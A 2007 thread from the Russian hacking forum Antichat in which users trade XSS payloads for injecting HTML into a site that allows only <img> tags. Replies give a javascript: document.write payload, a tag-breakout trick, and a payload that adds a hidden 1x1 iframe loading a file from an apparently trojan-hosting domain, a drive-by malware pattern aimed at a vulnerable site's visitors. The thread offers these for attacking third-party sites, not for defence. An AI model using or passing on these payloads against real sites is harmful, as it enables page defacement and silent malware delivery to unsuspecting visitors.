ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Iframe через XSS ...
  #1  
Старый 20.09.2007, 16:49
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
Провел на форуме:
1223241

Репутация: 183
Отправить сообщение для +StArT+ с помощью ICQ
Question Iframe через XSS ...

Возможно ли при наличии ХSS вида:
Код:
<IMG SRC="javascript:alert('XSS');">
выполнить html код, например <iframe>?

P.S Разрешенные теги только <img> =\
...
 
Ответить с цитированием

  #2  
Старый 20.09.2007, 16:56
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482

Репутация: 1796
По умолчанию

Возможно:
Код:
<IMG SRC="javascript:document.write('[html код]');">
ЗЫ все гениальное просто :)
__________________
Кто я?..

Последний раз редактировалось I-I()/Ib; 20.09.2007 в 16:58..
 
Ответить с цитированием

  #3  
Старый 20.09.2007, 17:52
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
Провел на форуме:
1223241

Репутация: 183
Отправить сообщение для +StArT+ с помощью ICQ
По умолчанию

Спасибо оч помог, но вот еще есть одна проблема,
при выполнении происходит редирект на пустую страницу, возможно ли этого как то избежать?
 
Ответить с цитированием

  #4  
Старый 20.09.2007, 23:24
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Это не редирект, это жаваскрипт всё стирает и создаёт вместо этого фреймы, была такаяже трабла, на форуме постали в мануал и в общем не избежать этого
 
Ответить с цитированием

  #5  
Старый 20.09.2007, 23:46
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

А вы не думали поставить ифрейм на страницу с XSS и на страницу которую надо проифреймить

Например
javascript:document.write('<iframe width=100% height=100% src="http://forum.antichat.ru/"></iframe><iframe width=1 height=1 src="http://vasyaHacker.rulez.troyan.co.ua/file.php"></iframe>');

И вообще, если ничего не фильтруется, попробуй обойти тег, то есть:
<IMG SRC=""><iframe.........>">

Почитай статьи о XSS и всё поймёшь %)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss-туннелинг: твой трафик в Xss канале Mo4x Чужие Статьи 6 19.07.2007 16:13
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ